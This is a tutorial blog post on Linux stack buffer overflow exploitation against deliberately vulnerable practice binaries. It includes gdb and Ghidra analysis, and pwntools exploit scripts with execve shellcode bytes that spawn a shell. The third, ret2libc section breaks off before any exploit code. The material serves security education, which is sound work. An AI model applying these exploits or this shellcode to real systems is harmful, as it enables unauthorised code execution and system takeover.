Header Image

Roman Hergenreder

IT-Security Consultant / Penetration Tester

Linux Binary Exploitation

This article consists of a small introduction to linux binary exploitation, with different types and methods, including a guide with python and pwntools. Last modified: 2022-09-06 09:29:51

Table of Contents

  1. Introduction
  2. Installing Requirements
  3. Binary #1: Pwning the Stack
    1. Analyzing the binary
    2. Writing an exploit
  4. Binary #2: Needing more space
  5. Binary #3: ret2libc
Binary exploitation is a big topic. It's not a trivial task, and it's very unlikely having success nowadays.
Firstly most software is running in some kind of virtual machine (JVM) or interpreter (python, php, …), which often mitigates those attacks unless the backend software itself is vulnerable.
Secondly most compilers make it really hard to exploit a bug, if it even occurs, using technologies like ASLR, Stack Canary and non-executable areas. Anyway, diving in to the topic is a good opportunity to learn, how binaries and operating system works, including memory management, registers, stack and heap and more.
To deal with the topic, we firstly need some tools for disassembling, debugging and interacting with the binary. For disassembling, there are a lot of different tools, but most common used are IDA, Ghidra and Radare. I mostly use IDA and Ghidra, both have advantages and disadvantages, e.g. IDA comes with debugging support and a graphical memory view, where Ghidra is more user-friendly when analysing the code in my opinion. For debugging, I recommend using gdb with a plugin like gef (GDB enhanced features). It should also come with an important feature checksec, if not, it can be downloaded checksec. The exploits I will show, are written in python using the pwntools library, which bundles many features like packing and unpacking bytes and numbers, assembling and disassembling instructions and crafting ROP Chains. If you want to craft the exploits by hand, or just want to check, what's available, I also recommend using ROPgadget
The first binary teaches us, how we can easily exploit a buffer overflow, by putting code on the stack and executing it. This attack is very unlikely to find in the wild, as it requires the stack to be executable and stack canary being disabled.
The gcc flags would be: -Wl,-z,execstack -fno-stack-protector -no-pie
[binary-file icon] Download Binary #1
First, we will check, what file we got using the file and checksec commands:
$ file stack_exec
stack_exec: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=7e64cae54d2fdf0456e3fb4997db8a24d1967a06, for GNU/Linux 3.2.0, not stripped
$ checksec stack_exec
[*] '/binary-exploitation/stack_exec'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
Let's look at all the values step by step. First, our file is an ELF file, which means Executable and Linkable Format and is the most common format for executables and shared libraries (.so files) on UNIX systems. Next, we see that the binary is a 64-bit LSB shared object, which affects the addressing, registers and stack word size: For 64-Bit binaries, we have usually an address and word size of 8 Byte (64 Bit), for 32-Bit binaries obviously 4 Byte. When looking at the stack and working with it, by using operations like push and pop, we will see, that the values also always have 8 and 4 Byte. The LSB stands for Least Significant Byte (sometimes Bit depending on the context). When jumping to an address, the hexadecimal or byte representation is reversed, so the address 0xFF000000 is 255 in decimal instead of 4278190080 (which would be MSB). The next thing dynamically linked: external code is loaded from a shared object file (dynamically) instead from the binary itself (statically linked). We will see later, how that works. The last important thing for the file command is, that the binary is not stripped, which basically means, that certain symbols like global variable and function names are not stripped off.
The checksec command shows us, the security aspects of the binary, detailed descriptions can be found here. Short explanation for every line:
So for own binary, it's an easy game, as there are no stack canaries, the stack is executable and the addresses are not randomized. Let's load the binary into Ghidra. On the top left, we will see the Symbol Tree with Exports. There we usually find the _start functions, which is kind of a wrapper loading our actual main method, we programmed. The function looks like this:
void _start(undefined8 param_1,undefined8 param_2,undefined8 param_3) {
  undefined8 in_stack_00000000;
  undefined auStack8 [8];
  
  __libc_start_main(main,in_stack_00000000,&stack0x00000008,__libc_csu_init,__libc_csu_fini,param_3,
  auStack8);
  do {
    /* WARNING: Do nothing block with infinite loop */
  } while( true );
}
All we need to know, that the first argument being passed to __libc_start_main is a pointer to our main function. Double-clicking it leads us to the important part:
undefined8 main(void)
{
  char local_78 [112];
  
  fwrite("Tell me your name: ",1,0x13,stdout);
  fgets(local_78,1000,stdin);
  return 0;
}
We can see, that firstly a buffer of 112 bytes is allocated (which is put on the stack). After a message is being printed, the code reads from the standard in (stdin) up to 1000 bytes to the allocated buffer and then just return. We can directly see, that it's possible to read more bytes than the buffer can hold. In fact, i compiled the binary with a buffer of 100 bytes, but as the buffer is being put on the stack, it has to fit an alignment, which is usually set by the compiler flag -mpreferred-stack-boundary, which defaults to 4 (16 Byte).
To exploit the fact, that the input buffer is not large enough for the fgets we first need to understand, what happens with the stack. Therefore, we will open gdb with our binary, set a breakpoint before and after the fgets call like shown below:
$ gdb stack_exec
Reading symbols from stack_exec...
gef ▸ disassemble main
Dump of assembler code for function main:
0x0000000000401138 <+0>: push rbp
0x0000000000401139 <+1>: mov rbp,rsp
0x000000000040113c <+4>: sub rsp,0x70
0x0000000000401140 <+8>: mov rax,QWORD PTR [rip+0x2ef9] # 0x404040 <stdout@@GLIBC_2.2.5>
0x0000000000401147 <+15>: mov rcx,rax
0x000000000040114a <+18>: mov edx,0x13
0x000000000040114f <+23>: mov esi,0x1
0x0000000000401154 <+28>: lea rdi,[rip+0xea9] # 0x402004
0x000000000040115b <+35>: call 0x401040 <fwrite@plt>
0x0000000000401160 <+40>: mov rdx,QWORD PTR [rip+0x2ee9] # 0x404050 <stdin@@GLIBC_2.2.5>
0x0000000000401167 <+47>: lea rax,[rbp-0x70]
0x000000000040116b <+51>: mov esi,0x3e8
0x0000000000401170 <+56>: mov rdi,rax
0x0000000000401173 <+59>: call 0x401030 <fgets@plt>
0x0000000000401178 <+64>: mov eax,0x0
0x000000000040117d <+69>: leave
0x000000000040117e <+70>: ret
End of assembler dump.
gef ▸ b *main+56
Breakpoint 1 at 0x401170
gef ▸ b *main+64
Breakpoint 2 at 0x401178
Next we will run the program and print the stack at the first breakpoint:
$ gdb stack_exec
(...)
gef ▸ gef config context.nb_lines_stack 16
gef ▸ run
gef ▸ context stack
0x00007fffffffe3b0│+0x0000: 0x0000000000000000 ← $rax, $rsp
0x00007fffffffe3b8│+0x0008: 0x0000000000001000
0x00007fffffffe3c0│+0x0010: 0x0000000000400040 → (bad)
0x00007fffffffe3c8│+0x0018: 0x000000000000000b
0x00007fffffffe3d0│+0x0020: 0x00007fffffffe440 → 0x0000000000401138 → <main+0> push rbp
0x00007fffffffe3d8│+0x0028: 0x00007fffffffe859 → 0x000034365f363878 ("x86_64"?)
0x00007fffffffe3e0│+0x0030: 0x00007ffff7fd43f0 → <dl_main+0> endbr64
0x00007fffffffe3e8│+0x0038: 0x00000000004011cd → <__libc_csu_init+77> add rbx, 0x1
0x00007fffffffe3f0│+0x0040: 0x0000000000000000
0x00007fffffffe3f8│+0x0048: 0x0000000000000000
0x00007fffffffe400│+0x0050: 0x0000000000401180 → <__libc_csu_init+0> endbr64
0x00007fffffffe408│+0x0058: 0x0000000000401050 → <_start+0> endbr64
0x00007fffffffe410│+0x0060: 0x00007fffffffe510 → 0x0000000000000001
0x00007fffffffe418│+0x0068: 0x0000000000000000
0x00007fffffffe420│+0x0070: 0x0000000000401180 → <__libc_csu_init+0> endbr64 ← $rbp
0x00007fffffffe428│+0x0078: 0x00007ffff7db9002 → <__libc_start_main+242> mov edi, eax
Now this looks a bit complicated at first sight. The stack is growing to lower addresses, which means, that values pushed first, have a higher address. We can ignore most of the values here anyways, but what we can see, is that the rax and rsp register point to the first address shown. We know, that this is the start address of our buffer, as the address was previously loaded into the register using lea rax,[rbp-0x70]. As there was only 0x70 (112) bytes allocated on the stack using sub rsp,0x70, we can also assume, that right before the buffer the last stack frame (rbp) and the return address are saved on the stack. The visualization of the stack should make it a bit clearer.

So the important addresses for us are:
  • 0x00007fffffffe3b0: Begin of the buffer
  • 0x00007fffffffe420: saved rbp
  • 0x00007fffffffe428: return address
[Stack Visualization]
Our target is now to taking control over the IP (instruction pointer), by overriding the return address. We can see, that the program crashes, if we type in 112 + 8 + 8 chars. Looking at the debugger again, we see the change of the stack:
$ gdb stack_exec
(...)
gef ▸ continue
Tell me your name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
gef ▸ context stack
0x00007fffffffe3b0│+0x0000: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]" ← $rax, $rsp, $r8
0x00007fffffffe3b8│+0x0008: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3c0│+0x0010: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3c8│+0x0018: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3d0│+0x0020: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3d8│+0x0028: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3e0│+0x0030: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3e8│+0x0038: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3f0│+0x0040: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe3f8│+0x0048: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
0x00007fffffffe400│+0x0050: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
0x00007fffffffe408│+0x0058: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
0x00007fffffffe410│+0x0060: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
0x00007fffffffe418│+0x0068: "AAAAAAAAAAAAAAAAAAAAAAAA\n"
0x00007fffffffe420│+0x0070: "AAAAAAAAAAAAAAAA\n" ← $rbp
0x00007fffffffe428│+0x0078: "AAAAAAAA\n"
gef ▸ continue
Program received signal SIGSEGV, Segmentation fault.
gef ▸ i reg $rbp
rbp 0x4141414141414141 0x4141414141414141
gef ▸ i reg $rip
rip 0x40117e 0x40117e <main+70>
We can see, that the rbp register was now overridden and the program tried to jump the the address on the stack. The address was invalid and produced an Segmentation fault. Using the values above, we now have the correct padding to overwrite the return address and can start writing our exploit. As we now the stack is executable, our idea is putting shell-code on the stack and then jumping into the stack. To achieve this, we need ROP Gadgets. ROP Gadgets are sequences of instructions which can be used to craft a certain chain of calls. They usually have the form of pop <reg>; ret. We can get a list of ROP Gadgets using the ROPgadget tool:
$ ROPgadget --binary stack_exec --all | grep "jmp rsp"
0x0000000000401136 : jmp rsp
If we put the address 0x0000000000401136 on the stack as return address, the program will firstly jump to our rop gadget and then jump to the address which is stored in the rsp register. The rsp register points in fact to the value right after the return address as the ret instructions takes the return address from the value pointed by the rsp register. Therefore, our shellcode needs to be placed right after the return address. We can take a working shell code from the exploit database shell code page. After searching for Linux/x86_64 - execve(/bin/sh), we find this shellcode. Now we will begin writing actual code. First we are creating a pwn template and replace all the code between io = start() and io.interactive():
[Stack Visualization]
$ pwn template stack_exec > exploit.py
No we will simply craft the buffer and spawn an interactive shell:
io = start()
buffer = b""
buffer += b"A" * (112+8)        # PADDING
buffer += p64(0x0000000000401136) # JMP RSP
buffer += b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05" # SHELLCODE
io.sendline(buffer)
io.interactive()
Executing the exploit, we will get a shell:
$ python exploit.py
[+] Starting local process '/challenge/stack_exec': pid 24147
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
Pwning this binary was of course pretty easy. The following binaries will be getting more complicated continuously
[binary-file icon] Download Binary #2
$ checksec stack_exec_2
[*] '/challenge/stack_exec_2'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
This binary is a bit more complex. We still got an executable stack, but this time, the address space is randomized. Fortunately, when looking at the disassembly, we can see, that the address of the buffer is leaked. Using this address, it's possible to determine the base pointer and thus calculating the location inside the memory. Also the fgets function only reads up to 32 bytes, the local buffer is 16 bytes big.
undefined8 main(void) {
  char acStack28 [20];
  fwrite("Tell me your name: ",1,0x13,stdout);
  fgets(acStack28,0x2b,stdin);
  return 0;
}
The basic idea is now the following: As the receive buffer is only 20 bytes big, which is not enough for shellcode, and we only got 6 bytes after the return address, we will create code, which will receive more data which is then executed. To achieve this, we have to overwrite the return address again using the jmp rsp gadget, then adding assembler code, which will subtract the rsp register and jumping into it again. Then, we will make a syscall to receive more data, which will be placed right after the instructions, so it's executed immediately without needing to jump somewhere. To make a syscall, we will make use of this website. Because we got a 64-Bit binary, we will have to set the registers according to the table (instead of pushing the values on the stack like for 32-Bit binaries) and then call syscall.
[Stack Visualization]
After creating the pwn template again, we need to search our desired ROP Gadget. The jmp rsp gadget is located at 0x00000000004011ab. Now we need some code, which will call fgets again, and place them on the stack. The complete payload will now look like this:
io = start()
padding = 28
# rax = 0, FD = 0 (stdout), destination = buffer + 22, count = 100
buf = b""
buf += asm("xor rax, rax; xor rdi, rdi; mov rsi, rsp; add rsi, 22; mov rdx, 100; syscall")
buf += b"A" * (padding - len(buf))
buf += p64(0x0000000000401136) # jmp rsp
buf += asm("sub rsp, 36; jmp rsp") # rsp = buffer
io.send(buf) 
io.sendline(b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05") # SHELLCODE
io.interactive()
And the payload is indeed working:
$ python exploit.py
[+] Starting local process '/challenge/stack_exec_2': pid 69964
[*] Switching to interactive mode
$ id
uid=0(root) gid=0(root) groups=0(root)
[binary-file icon] Download Binary #3
$ checksec ret2libc
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
undefined8 main(void) {
  char local_28 [32];
  fwrite("Tell me your name: ",1,0x13,stdout);
  fgets(local_28,0x80,stdin);
  return 0;
}

This time the exploitation will get a bit more complicated: Stack and other writeable segments are not executable, so we are not able to place shellcode or other instructions on the stack and execute them. Now we will make use of real ROP Chains.
First we need to find out, which libc version is used.
[Stack Visualisation]